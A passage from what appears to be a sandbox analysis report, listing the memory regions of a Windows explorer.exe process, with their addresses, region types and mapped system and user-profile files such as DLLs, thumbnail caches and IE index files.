"c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 628 start_va = 0x3c50000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 629 start_va = 0x3c60000 end_va = 0x3c67fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 630 start_va = 0x3c70000 end_va = 0x3c70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c70000" filename = "" Region: id = 631 start_va = 0x3c90000 end_va = 0x3d0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 632 start_va = 0x3d10000 end_va = 0x3d10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d10000" filename = "" Region: id = 633 start_va = 0x3d20000 end_va = 0x3d20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 634 start_va = 0x3d30000 end_va = 0x3d30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d30000" filename = "" Region: id = 635 start_va = 0x3d40000 end_va = 0x3d41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003d40000" filename = "" Region: id = 636 start_va = 0x3d50000 end_va = 0x3dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 637 start_va = 0x3dd0000 end_va = 0x3fcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dd0000" filename = "" Region: id = 638 start_va = 0x4020000 end_va = 0x409ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 639 start_va = 0x40b0000 end_va = 0x412ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040b0000" filename = "" Region: id = 640 start_va = 0x4140000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 641 start_va = 0x4220000 end_va = 0x429ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004220000" filename = "" Region: id = 642 start_va = 0x42d0000 end_va = 0x42d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alttab.dll.mui" filename = "\\Windows\\System32\\en-US\\AltTab.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\alttab.dll.mui") Region: id = 643 start_va = 0x42e0000 end_va = 0x42e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 644 start_va = 0x42f0000 end_va = 0x436ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042f0000" filename = "" Region: id = 645 start_va = 0x4370000 end_va = 0x56c4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 646 start_va = 0x56d0000 end_va = 0x5ad2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000056d0000" filename = "" Region: id = 647 start_va = 0x5ae0000 end_va = 0x5ae1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ae0000" filename = "" Region: id = 648 start_va = 0x5af0000 end_va = 0x5af1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005af0000" filename = "" Region: id = 649 start_va = 0x5b00000 end_va = 0x5b01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b00000" filename = "" Region: id = 650 start_va = 0x5b10000 end_va = 0x5b10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 651 start_va = 0x5b20000 end_va = 0x5b21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b20000" filename = "" Region: id = 652 start_va = 0x5b30000 end_va = 0x5b36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 653 start_va = 0x5b40000 end_va = 0x5b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b40000" filename = "" Region: id = 654 start_va = 0x5b50000 end_va = 0x5b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b50000" filename = "" Region: id = 655 start_va = 0x5b60000 end_va = 0x5b61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b60000" filename = "" Region: id = 656 start_va = 0x5b70000 end_va = 0x5b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b70000" filename = "" Region: id = 657 start_va = 0x5b80000 end_va = 0x5b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b80000" filename = "" Region: id = 658 start_va = 0x5b90000 end_va = 0x5bb8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 659 start_va = 0x5be0000 end_va = 0x5c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005be0000" filename = "" Region: id = 660 start_va = 0x5d50000 end_va = 0x5dcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d50000" filename = "" Region: id = 661 start_va = 0x5e30000 end_va = 0x5eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e30000" filename = "" Region: id = 662 start_va = 0x5eb0000 end_va = 0x5faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 663 start_va = 0x6030000 end_va = 0x60affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006030000" filename = "" Region: id = 664 start_va = 0x60b0000 end_va = 0x612ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000060b0000" filename = "" Region: id = 665 start_va = 0x61b0000 end_va = 0x622ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061b0000" filename = "" Region: id = 666 start_va = 0x6230000 end_va = 0x62affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006230000" filename = "" Region: id = 667 start_va = 0x62d0000 end_va = 0x634ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062d0000" filename = "" Region: id = 668 start_va = 0x6350000 end_va = 0x644ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 669 start_va = 0x6540000 end_va = 0x654ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006540000" filename = "" Region: id = 670 start_va = 0x6590000 end_va = 0x660ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006590000" filename = "" Region: id = 671 start_va = 0x6610000 end_va = 0x668ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006610000" filename = "" Region: id = 672 start_va = 0x6690000 end_va = 0x670ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006690000" filename = "" Region: id = 673 start_va = 0x6720000 end_va = 0x679ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006720000" filename = "" Region: id = 674 start_va = 0x7b00000 end_va = 0x7bfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 675 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 676 start_va = 0x7d00000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 677 start_va = 0x8100000 end_va = 0x83fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 678 start_va = 0x8400000 end_va = 0x84fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 679 start_va = 0x8500000 end_va = 0x85fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 680 start_va = 0x8600000 end_va = 0x86fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 681 start_va = 0x8700000 end_va = 0x87fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 682 start_va = 0x8800000 end_va = 0x88fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 683 start_va = 0x8960000 end_va = 0x89dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008960000" filename = "" Region: id = 684 start_va = 0x89e0000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 685 start_va = 0x8ae0000 end_va = 0x8bdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 686 start_va = 0x8be0000 end_va = 0x8cdffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 687 start_va = 0x8d60000 end_va = 0x8ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d60000" filename = "" Region: id = 688 start_va = 0x8de0000 end_va = 0xa134fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 689 start_va = 0xa140000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 690 start_va = 0xa240000 end_va = 0xa33ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 691 start_va = 0xa340000 end_va = 0xa43ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 692 start_va = 0xa580000 end_va = 0xa5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a580000" filename = "" Region: id = 693 start_va = 0xb440000 end_va = 0xb56ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 694 start_va = 0xb6f0000 end_va = 0xb76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6f0000" filename = "" Region: id = 695 start_va = 0xc390000 end_va = 0xc40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c390000" filename = "" Region: id = 696 start_va = 0x74220000 end_va = 0x74225fff monitored = 0 entry_point = 0x74221010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 697 start_va = 0x754a0000 end_va = 0x75582fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 698 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 699 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 700 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 701 start_va = 0x77a50000 end_va = 0x77a56fff monitored = 0 entry_point = 0x77a5106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 702 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 703 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 704 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 705 start_va = 0xffbf0000 end_va = 0xffeaffff monitored = 0 entry_point = 0xffc1b790 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 706 start_va = 0x7fef24a0000 end_va = 0x7fef2576fff monitored = 0 entry_point = 0x7fef24a1074 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\System32\\SearchFolder.dll" (normalized: "c:\\windows\\system32\\searchfolder.dll") Region: id = 707 start_va = 0x7fef2620000 end_va = 0x7fef265afff monitored = 0 entry_point = 0x7fef2621238 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 708 start_va = 0x7fef2660000 end_va = 0x7fef27b3fff monitored = 0 entry_point = 0x7fef2667d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoshext.dll") Region: id = 709 start_va = 0x7fef2c00000 end_va = 0x7fef2cc5fff monitored = 0 entry_point = 0x7fef2c0f220 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 710 start_va = 0x7fef3c40000 end_va = 0x7fef3c5efff monitored = 0 entry_point = 0x7fef3c457b8 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 711 start_va = 0x7fef4cc0000 end_va = 0x7fef4ccafff monitored = 0 entry_point = 0x7fef4cc5740 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 712 start_va = 0x7fef4cd0000 end_va = 0x7fef4d12fff monitored = 0 entry_point = 0x7fef4cf1b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 713 start_va = 0x7fef4d20000 end_va = 0x7fef4e5bfff monitored = 0 entry_point = 0x7fef4d2197c region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 714 start_va = 0x7fef4f00000 end_va = 0x7fef4f18fff monitored = 0 entry_point = 0x7fef4f1077c region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 715 start_va = 0x7fef4fa0000 end_va = 0x7fef50befff monitored = 0 entry_point = 0x7fef4fb339c region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 716 start_va = 0x7fef50c0000 end_va = 0x7fef50e7fff monitored = 0 entry_point = 0x7fef50d3cc4 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 717 start_va = 0x7fef5110000 end_va = 0x7fef5122fff monitored = 0 entry_point = 0x7fef511a8b8 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 718 start_va = 0x7fef5140000 end_va = 0x7fef51dcfff monitored = 0 entry_point = 0x7fef51cd52c region_type = mapped_file name = "fxsapi.dll" filename = "\\Windows\\System32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll") Region: id = 719 start_va = 0x7fef51e0000 end_va = 0x7fef52b6fff monitored = 0 entry_point = 0x7fef51e1254 region_type = mapped_file name = "fxsst.dll" filename = "\\Windows\\System32\\FXSST.dll" (normalized: "c:\\windows\\system32\\fxsst.dll") Region: id = 720 start_va = 0x7fef52c0000 end_va = 0x7fef52f0fff monitored = 0 entry_point = 0x7fef52c1b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 721 start_va = 0x7fef5300000 end_va = 0x7fef5354fff monitored = 0 entry_point = 0x7fef53026e4 region_type = mapped_file name = "hgcpl.dll" filename = "\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll") Region: id = 722 start_va = 0x7fef5360000 end_va = 0x7fef53defff monitored = 0 entry_point = 0x7fef5361070 region_type = mapped_file name = "imapi2.dll" filename = "\\Windows\\System32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll") Region: id = 723 start_va = 0x7fef53e0000 end_va = 0x7fef54a1fff monitored = 0 entry_point = 0x7fef54004b4 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 724 start_va = 0x7fef54b0000 end_va = 0x7fef56dafff monitored = 0 entry_point = 0x7fef54b1f00 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 725 start_va = 0x7fef56e0000 end_va = 0x7fef5733fff monitored = 0 entry_point = 0x7fef56e104c region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 726 start_va = 0x7fef5740000 end_va = 0x7fef62f6fff monitored = 0 entry_point = 0x7fef5741bd8 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 727 start_va = 0x7fef6300000 end_va = 0x7fef63b4fff monitored = 0 entry_point = 0x7fef6321cd0 region_type = mapped_file name = "bthprops.cpl" filename = "\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl") Region: id = 728 start_va = 0x7fef63c0000 end_va = 0x7fef6404fff monitored = 0 entry_point = 0x7fef63c4190 region_type = mapped_file name = "qagent.dll" filename = "\\Windows\\System32\\QAGENT.DLL" (normalized: "c:\\windows\\system32\\qagent.dll") Region: id = 729 start_va = 0x7fef6410000 end_va = 0x7fef6467fff monitored = 0 entry_point = 0x7fef64130f0 region_type = mapped_file name = "srchadmin.dll" filename = "\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll") Region: id = 730 start_va = 0x7fef6470000 end_va = 0x7fef64cdfff monitored = 0 entry_point = 0x7fef64aa7fc region_type = mapped_file name = "wwanapi.dll" filename = "\\Windows\\System32\\WWanAPI.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll") Region: id = 731 start_va = 0x7fef64d0000 end_va = 0x7fef64effff monitored = 0 entry_point = 0x7fef64d1010 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 732 start_va = 0x7fef64f0000 end_va = 0x7fef64fcfff monitored = 0 entry_point = 0x7fef64f7104 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 733 start_va = 0x7fef6500000 end_va = 0x7fef6506fff monitored = 0 entry_point = 0x7fef6501b24 region_type = mapped_file name = "wlanutil.dll" filename = "\\Windows\\System32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll") Region: id = 734 start_va = 0x7fef6510000 end_va = 0x7fef654efff monitored = 0 entry_point = 0x7fef65112c0 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Region: id = 735 start_va = 0x7fef6740000 end_va = 0x7fef68fcfff monitored = 0 entry_point = 0x7fef6741010 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 736 start_va = 0x7fef6900000 end_va = 0x7fef6b8afff monitored = 0 entry_point = 0x7fef6906f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 737 start_va = 0x7fef6b90000 end_va = 0x7fef6c03fff monitored = 0 entry_point = 0x7fef6bc54c8 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 738 start_va = 0x7fef6c30000 end_va = 0x7fef6c4efff monitored = 0 entry_point = 0x7fef6c33580 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 739 start_va = 0x7fef6c50000 end_va = 0x7fef6c88fff monitored = 0 entry_point = 0x7fef6c51240 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 740 start_va = 0x7fef6c90000 end_va = 0x7fef6caffff monitored = 0 entry_point = 0x7fef6c91298 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 741 start_va = 0x7fef6eb0000 end_va = 0x7fef6f22fff monitored = 0 entry_point = 0x7fef6f0c7f8 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 742 start_va = 0x7fef6fb0000 end_va = 0x7fef6fb8fff monitored = 0 entry_point = 0x7fef6fb2f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 743 start_va = 0x7fef6fc0000 end_va = 0x7fef6fd7fff monitored = 0 entry_point = 0x7fef6fc1060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 744 start_va = 0x7fef6fe0000 end_va = 0x7fef717bfff monitored = 0 entry_point = 0x7fef6fe1030 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 745 start_va = 0x7fef7180000 end_va = 0x7fef71a0fff monitored = 0 entry_point = 0x7fef71873a0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 746 start_va = 0x7fef71b0000 end_va = 0x7fef722efff monitored = 0 entry_point = 0x7fef720385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 747 start_va = 0x7fef7230000 end_va = 0x7fef726afff monitored = 0 entry_point = 0x7fef7231070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 748 start_va = 0x7fef7340000 end_va = 0x7fef7348fff monitored = 0 entry_point = 0x7fef73435c0 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 749 start_va = 0x7fef7350000 end_va = 0x7fef75f2fff monitored = 0 entry_point = 0x7fef7353498 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 750 start_va = 0x7fef7600000 end_va = 0x7fef760bfff monitored = 0 entry_point = 0x7fef7601380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 751 start_va = 0x7fef7610000 end_va = 0x7fef7643fff monitored = 0 entry_point = 0x7fef7611890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 752 start_va = 0x7fef7650000 end_va = 0x7fef773dfff monitored = 0 entry_point = 0x7fef76512a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 753 start_va = 0x7fef7740000 end_va = 0x7fef77c2fff monitored = 0 entry_point = 0x7fef776692c region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 754 start_va = 0x7fef77d0000 end_va = 0x7fef7aa1fff monitored = 0 entry_point = 0x7fef78315f0 region_type = mapped_file name = "themeui.dll" filename = "\\Windows\\System32\\themeui.dll" (normalized: "c:\\windows\\system32\\themeui.dll") Region: id = 755 start_va = 0x7fef7ab0000 end_va = 0x7fef7ab7fff monitored = 0 entry_point = 0x7fef7ab1030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" 